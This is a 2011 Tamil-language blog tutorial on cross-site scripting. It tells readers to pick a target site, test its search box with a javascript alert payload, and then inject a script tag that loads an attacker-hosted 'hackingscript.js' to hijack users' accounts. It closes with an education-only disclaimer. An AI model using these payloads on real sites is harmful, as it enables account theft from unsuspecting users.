Tuesday, 8 March 2011

XSS attack [ எக்ஸ் எஸ் எஸ் தாக்குதல் ]

வணக்கம் நண்பர்களே, இன்று கிட்டத்தட்ட ஒரு வாரத்திற்கு பிறகு பதிவெழுதுவதற்கு கொஞ்சம் நேரம் கிடைத்திருக்கின்றது. இன்று நாங்கள் பார்க்கப்போவது XSS attack பற்றியாகும். இன்று எல்லோருக்கும் இணையத்தளம் ஒன்றினை வடிவமைக்கத்தெரியும். இதில் எத்தனை பேருக்கு தாங்கள் தயாரிக்கும் தளத்தினை எவ்வாறு சிறந்த முறையில் பாதுகாப்பது என்று தெரியும். அது கேள்விக்குறியே. சரி.  நாம் விடையத்திற்கு வருவோம். 

XSS ATTACK என்பது பெரும்பாலும் ஒழுங்காக பாதுகாக்கப்படாத தளங்களில் CLIENT SIDE SCRIPT மூலமாக தாக்குதல் நடத்தும் முறையாகும். இம்முறையானது பொதுவாக ஒரு பாதுகாப்பு குறைபாடு உள்ள தளத்திலே ஒரு சாதாரண பயனாளர் உள்நுழையும் போது அவருடன் இணைந்து தாக்குதல் தாரியும் உள்நுழைந்து இணையத்திலே மாற்றங்களை ஏற்படுத்துவது தான் XSS ATTACK என்று குறிப்பிடப்படுகின்றது. இதனை Cross site scripting என்றும் அழைப்பார்கள்.

பொதுவாக சாதாரண ஒரு HTTP REQUEST மூலமாகவே இத்தாக்குதலினை எளிதாக நடத்தி முடித்துவிடலாம். பெரும்பாலும் PHP பயன்படுத்தி இயங்குகின்ற தளங்களில் தான் இந்த மாதிரியான தாக்குதல்கள் அதிகம் இடம்பெறுகின்றன. உதாரணமாக சொல்லப்போனால் நீங்கள் சாதாரணமாக ஒரு கலந்துரையாடல் தளத்திலே இருக்கின்றீர்கள். அங்கு நல்ல கவர்சிகரமான ஒரு பதிவு இடப்பட்டு இருக்கின்றது. நீங்கள் அங்கு சொடுக்கும் பட்சத்தில் நீங்கள் அந்த பதிவினை காண்பீர்கள். ஆனால் அதே சமயத்தில் உங்கள் கணக்கு திருடு போய் இருக்கும். இந்த மாதிரியான திருட்டினைத்தான் நாம் XSS ATTACK என்று கூறிகின்றோம்.சரி மிக இலகுவாக எவ்வாறு ஒரு தாக்குதலினை தொடரலாம் என்பதை இங்கு பார்க்கலாம்.

தளத்தினை பரிசீலித்தல்

நீங்கள் தாக்கவிருக்கும் தளத்திளை தெரிவு செய்த பின்னர் அத்தளத்திலே தேடுவதற்கு Search box இருக்குமாயின் அப்பெட்டியினுள் கீழ் வரும் கோடிங்கை இட்டு தேடிப்பாருங்கள். அப்பொழுது உங்களுக்கு தெரியும் இத்தளம் தாக்குதலுக்கு இலகுவானதா இல்லையா என்று. 

<IMG SRC=JaVaScRiPt:alert('Site is vulnerable')>

இது போன்று நீங்கள் தேடும் பொழுது அடைப்புக்குறிக்குள் இருக்கும் தகவல் ஒரு POP UP window வில் தோன்றுமாயில் அத்தளம் தாக்குதலுக்கு இலகுவானது என்ற முடிவுக்கு வரலாம்.  அடுத்து நீங்கள் அத்தளத்தினிலே உங்கள் தளத்திலே நிறுவியிருக்கும் ஜாவா நிரலிக்கான தொடுப்பினை கீழ்க்கண்டவாறு கொடுத்து விட்டால் சரி. 

<SCRIPT SRC=http://yourwebsite.com/hackingscript.js></SCRIPT>

இவ்வாறு நீங்கள் ஏற்கனவே பதிவேற்றி வைத்திருக்கும் உங்கள் தளத்தின் ஜாவா நிரலியின் தொடுப்பினை கொடுத்து விட்டால் சரி. இதிலே சொடுக்கும் ஒவ்வொரு சந்தர்ப்பங்களிலும் உங்கள் ஜாவா நிரலி செயற்படும். சரி. இது தான் சாதாரண ஒரு செயன்முறை.

எவ்வாறு அத்தளத்திலே இருக்கும் உறுப்பினர்களை உங்கள் வலையில் சிக்கவைப்பது அதற்கு எவ்வாறு SOCIAL ENGINEERING செய்வது போன்ற விடையங்கள் எல்லாம் நான் சொல்லுவேன் என்று எதிர்பார்த்தால் நீங்கள் ஒரு கொந்தாரக ஆகவே முடியாது. { Don't learn to hack. hack to learn }. இது யார் சொன்னது என்ற ஆராய்ச்சி எல்லாம் நமக்கு தேவையில்லாத ஒன்று.

குறிப்பு: நண்பர்களே, நான் இங்கு வழங்கும் விடையங்கள்  மற்றும் நிரலிகள் அனைத்தும் கல்வி நோக்கத்திற்காகவே. தகவல் திருட்டு ஒரு பாரிய குற்றம். சிந்தித்து செயற்படுங்கள். 

0 பின்னுாட்டங்கள்:

Post a Comment